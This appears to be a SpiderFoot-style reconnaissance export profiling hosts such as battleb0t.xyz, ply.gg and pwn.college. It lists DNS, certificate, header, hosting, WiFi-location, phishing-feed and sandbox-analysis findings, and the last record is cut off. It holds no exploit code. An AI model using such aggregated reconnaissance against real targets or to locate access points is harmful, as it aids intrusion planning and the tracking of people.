| 2023-05-12 02:54:13 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::/48 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CORGI-2 (Net ID: 00:14:6C:7C:72:22) | 32.8608, -79.9746 |
| 2023-05-12 03:41:52 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["315"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]} | 45.131.109.53 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Guernsey | ply.gg |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | http://ns.adobe.com/xap/1.0/
XPhotoshop 3.0
Photo Booth
ICC_PROFILE
mntrRGB XYZ
acspAPPL
-appl
bdscm
vcgt
0ndin
>chad
8bTRC
aagg
desc
Display
0daDK
FnlNL
bfiFI
xitIT
$viVN
.skSK
<zhCN
$ruRU
RenGB
vfrFR
vesXL
"elGR
4svSE
VtrTR
fptPT
zjaJP
Dtext
A l
!H!u!
"'"U"
'I'z'
-A-v-
/$/Z/
050l0
676r6
7$7`7
:6:t:
<'<e<
> >`>
?!?a?
B0BrB
F"FgF
P'PqP
nmmod
B`@$s
eww<`
FR'<c
zR0f9
PFOPx
3nX7
U?.0H
Xax9<
z41jH
@gc3nw9bq
Kj @yS
S`YdR
pj2OL
MZw'bp
:'W9q
661:H
SInxX
\1<qXs\
mnMuV:
TjO99
VgDer
eA$tn:
n3 3.y<
y78$p
o XfI
\XYbs
HmJ92
5m6s4W6
BMNnW
Ye8-uc<
-8-"z
K1yeb
WOCiB
:sRWG
p1A1w$
p!O9'
9_FTOO
TNCaA
pEz\3
'-fp?
7m9 z
6:WE:
?Ol<U
$hpp@
K$_4e
zDrA9
.>`x?
\rKis
zWGml
NOAVR
9?S\. | https://funny.battleb0t.xyz/images/jcqn.jpg |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Bug and issue tracking software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 104.21.6.166 |
| 2023-05-12 02:56:58 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a3:c5:54:80:ec:15:48:8e:60:57:c2:56:21:02:dc:33:b2:67:
3c:b1:4d:e5:1f:de:da:ed:a7:e3:8d:b7:03:a3:f4:cc:b6:e1:
1e:b1:21:17:9e:36:0c:2a:fd:f3:0a:f5:98:b6:cc:3c:01:67:
f2:0d:fc:88:12:e2:d6:83:96:22:f2:3a:bb:54:5e:67:b9:fa:
0b:ad:7a:8d:5d:db:b1:9d:a3:cb:38:99:91:47:54:50:04:49:
4c:4b:88:c5:e7:74:21:f3:ca:60:d8:72:6d:c3:a3:f9:c2:7e:
0b:52:23:2d:ac:85:06:0b:ad:5c:f7:db:13:07:0b:7b:6d:f5:
2f:d3:bc:b1:6b:2a:74:2f:9e:80:c3:aa:10:0b:63:bc:43:b6:
74:f7:8c:dd:83:d1:7d:5d:ba:58:70:ca:ea:2d:07:d9:a9:56:
60:b3:6e:29:b1:ee:a9:c9:ca:0f:33:89:8b:44:0b:de:d1:75:
1d:b7:8b:4c:86:7b:5b:32:c0:1e:15:9e:8b:ec:63:cf:99:d1:
62:4e:5a:85:07:ac:08:3d:a0:31:af:ac:50:c9:09:ed:b3:2e:
9f:e5:63:7d:b8:46:50:15:49:e6:16:2e:ad:ae:5c:d1:17:72:
04:af:52:88:b6:66:c9:13:ad:15:0a:c2:ba:2f:69:ae:eb:7a:
39:e4:67:40
|
| 2023-05-12 02:44:15 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi2.battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007-liang.github.io]
https://www.openphish.com/feed.txt | 007-liang.github.io |
| 2023-05-12 02:55:02 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://pwn.college/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFDE0.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFE20.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "8.252.188.126:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_804_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2052"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_804_IESQMMUTEX_0_331"\n "IsoScope_804_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_804_IE_EarlyTabStart_0xf78_Mutex"\n "IsoScope_804_ConnHashTable<2052>_HashTable_Mutex"\n "IsoScope_804_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFE1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabFDDF.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003336]\n "~DFE21E09FE22C2FEB2.TMP" has type "data"- Location: [%TEMP%\\~DFE21E09FE22C2FEB2.TMP]- [targetUID: 00000000-00002052]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DFD99A0B0D863F67D1.TMP" has type "data"- Location: [%TEMP%\\~DFD99A0B0D863F67D1.TMP]- [targetUID: 00000000-00002052]\n "LHCS4QQD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LHCS4QQD.txt]- [targetUID: 00000000-00003336]\n "_1B7C6C58-B789-11ED-93A4-080027456658_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "O72WPLVL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\O72WPLVL.txt]- [targetUID: 00000000-00002052]\n "favicon_6_.png" has type "PNG image data 32 x 32 8-bit colormap non-interlaced"- [targetUID: N/A]\n "RecoveryStore._1000B8DF-B789-11ED-93A4-080027456658_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF127C77FF0F1B432F.TMP" has type "data"- Location: [%TEMP%\\~DF127C77FF0F1B432F.TMP]- [targetUID: 00000000-00002052]\n "TarFDE0.tmp" has type "data"- Location: [%TEMP%\\TarFDE0.tmp]- [targetUID: 00000000-00003336]\n "CabFE1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFE1F.tmp]- [targetUID: 00000000-00003336]\n "JSJJ6FDH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JSJJ6FDH.txt]- [targetUID: 00000000-00002052]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bullet_1_.png" has type "PNG image data 24 x 10 16-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "NPYG33H2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPYG33H2.txt]- [targetUID: 00000000-00003336]\n "VGWV1EI4.htm" has type "HTML document UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\VGWV1EI4.htm]- [targetUID: 00000000-00003336]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive"\n "ZrHl\\e+8Lny)lO\n"!IpRU[uItHN2[SEqtg{/>ITng1LRDNoGIYC[W^/"*/QbM+ekZer/B2HR/UyTD)X5?n97#z:?9y~<9>>~r\\=?<Ox\\>]CC(7\\q//?_\\zg{x:TM(BG\'\'b8qJ]j^\'J#u>L<j*WVt[b\\QXS([nfqs^zD^O\n?xrEI+%mN+%2Z>^$skV|=[ik?H;nzQ1f4.KeO#ipWe\'_SV/""I4OV6rQ292vMb-mf`@\nN}v_tpp~L_XD"cP_?sYcp&e%\nxjBk<tuNF1@6_D:>gx1I{cS~fk<\\~+?PqJ\nfAkU)e*VVJYrfr hta%6*mf\n\n.7*01Vx7s1EFTX2sHF%cR.fxy+bvtgi4ftV@\\vx%D"34cK `b5Z:Y%Iu)Gf(G\n`0mb2KV:,mg\nE<76W)@fRr)/JqaKq[B&.+(mJQ5?~\'5 v (8zhJs\n|(s3xG#a|1vUp,rpHyQ?AD^66C~obc*8\n\nE4seT<C&J:%:04h ]5B\'$^\'fj@tOd"6GC/sNYD\nl2rx}X-1ITlWJ;", "iLHE`*43\n&^$7b2i\n^_Cx(E F2EN,#?v7+wWSq5{w3m- NP_V3E11nS>>yVXS^]f`/T8n/`Tyl`f>.?rrt9}j5\\z}>~Q\\?/IN qVyZf-tYLegc"?6dM-\n$7@\nh2%kPm\nq4 5!,{z1%1(!.)j b`\np*##kL;ZD\nuvtK%IXKv|]#EKZVKw7CtK7Jcm<a")d&g#Z)xFGKcr=F^Mhs\nY@H9%cL\\Ys2[Q*t&]^tqu5x{sj2;;\'3jSn,J)/Z!DcP\nP[NF>fHXyIZCov(`@di\nk{\'\nUSW31N(38?Mv QboR#p|>1dP#l21bD.T #)uO =I BI7u.n`I9B6KWV+[OOM$DDP&tqxkGz4F+P2yjy`>9<.2Qd,4Lg-J>H<Qk7p-^l!fUd%\nXtby}QY{U(B,x\n+BZ\nNO%Ei7$\\+Jr:~f2&XzaF;rVV$`8$p<&HOrj.Pb\n/V;UCk\nD#o\n}9l2AM% `z VOa A1*)^6~7T/Cwk/ydSPHUIzY>y,sYZa( &ayX-1\n\'/wUr741c3f|k<D"\n "r`f5xJ+*4@icNg0V}b8\nB{J;e0Xvr`7"ywUA$?L*34r)?kXMD|\',"Da=bbXTG=x ^~xtV<1o,5|(u[Aw~IJ!.T.?[0IDY0~ng+m*GYz+v)iy0m(4%{hS/J!#J*8K\\[wk:-Q7S}v59\n~A0**ns\'ru~k@C)R)AAECg74~1m>Cb[Fxbo^Y"CwpgC\\lX%feH18 ,Z^.L87[RTzq-:=E-#k04"}}^^683Uzx73Ri|[.gfr6}rNO&jR5hulGjYhW64{c1~A A\n^P`P6 @OG;wdQV3Z0.yf!uw[\nTRb?Dp=F4\nNzBY*}j>h\\}UL20"(I7{IGx^0ta!)\n@9%O|grXu6drvt!)9v)|W0^*)h=|!e9w.//?lv\'pQ!YIgw/hcuHQ2(K*~4sEmn<1#L*<<M#>0%6wm&@MI:w.YW-]7.],d,^)E5y`>sVl[oNAp9![*/GTa<\'9leK1w@=->~Q05V8hv(xh@u_VOk6\'d\n2~rvH5}\n p;,Qj!zY U9Ra" V}ach\')&\'!Gm:", "mID#29Q\nLDlMUUw{W_[nH\nTO\nh7f*Ad4u|PV)Ko`n`rTtRBi$@FgarOu^)H~2\n\n%CnjT$UkEdTHQ}AS& IuwAnm}*-A=B?>9y%-\n3\\o|7at{B&N)Q%f|O(V\\m%|Oe[J1O<"G]bhw?-b*SMe*DIS_J2MU\\RYIIa JgI84,5=kM~\nI_~|-_Eo}dj?"}TL!)\\<2L6ccuZlL|>1eq=/I8_]u*.", "GET /assets/css/style.css?v=f0893638821a8444049e923a1938a171949f6fa9 HTTP/1.1\nAccept: text/css\n */*\nReferer: https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive", "W[6~5!dySZl\n8AM="bxh+\\k8HH\\c/R@"\n4N;" u}#R;w50A`-IWr|Z% t :S C3i_}2\\:1si:|mk&$ReV4Vf\\@\\{#!SHMCd$NefD0{2kMf4q(LinJMB�},$g?(%KtJ\n{#tEcN=A9C1g*+)*D bPBR1YsvQPrJ*QL\'Vfz/,<cvr!!V7%*sF9O[u&slke}irZa A)=C}ws={:F\\(e;R"t[12:I{cn:>z\'=xQl}}\n,#YYIwz[+&H9Ra2:Q[Q1IQNQEpcA0Ey\';$R0"0IWX\nbSdT"j7k9p"9Q6s[HU)cv"d7B_[y@/@6*Nec`\\(_L6tGN2[)o{J\ny.*JHU\nsY6-\n#p5eoF$RQ*s6W!.G9WYN3lG\n]Kv)}}h{J[b[;i$sjP/jTHrV=fcc2tm4Muo6*Pm(M_bYnY9|7n/u?/i#9:wZU<K^Z;hux~}Zg?dLity"<ohfJk8;6FoDY\'AuT+"hU7Lb.8&Yp=L}uP"tc;7mLWol:??%n?1hG\'l5jTf\\pNeHn)a/23pg[\'?Q:tGZTrE+-T_C", "i", "GET /assets/images/bkg.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Alive", "GET /assets/images/bullet.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://pwn.college/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: pwn.college\nDNT: 1\nConnection: Keep-Aliv | 185.199.109.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:02:DD:85:3E:34) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:46:49 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 35.229.48.116 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:80 | 104.21.6.166 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 114.48.229.35.bc.googleusercontent.com | 35.229.48.114 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605fb97f4259-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:57:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://kamekititamiko.com/favicon/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3964.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003656) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3552 -s 132" (UID: 00000000-00003656)'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "DBWinMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f1c_IESQMMUTEX_0_519"\n "IsoScope_f1c_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3868"\n "IsoScope_f1c_IE_EarlyTabStart_0xfe8_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_f1c_ConnHashTable<3868>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3868"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3552 -s 132" (UID: 00000000-00003656)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"\n "52.155.62.95:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab38F6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab38D5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"~DFD25448FC7F6A6276.TMP" has type "data"- Location: [%TEMP%\\~DFD25448FC7F6A6276.TMP]- [targetUID: 00000000-00003868]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003576]\n "Cab38F6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab38F6.tmp]- [targetUID: 00000000-00003576]\n "725C371ABA02CD431C8DE4D18E4AA0CE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\725C371ABA02CD431C8DE4D18E4AA0CE]- [targetUID: 00000000-00003576]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003868]\n "~DF6FA7BF0440BF9C6E.TMP" has type "data"- Location: [%TEMP%\\~DF6FA7BF0440BF9C6E.TMP]- [targetUID: 00000000-00003868]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003868]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003868]\n "~DFC9E478F3FDB996C2.TMP" has type "data"- Location: [%TEMP%\\~DFC9E478F3FDB996C2.TMP]- [targetUID: 00000000-00003868]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003868]\n "NIC6QOUG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NIC6QOUG.txt]- [targetUID: 00000000-00003868]\n "Cab38D5.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab38D5.tmp]- [targetUID: 00000000-00003576]\n "Tar38D6.tmp" has type "data"- Location: [%TEMP%\\Tar38D6.tmp]- [targetUID: 00000000-00003576]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: 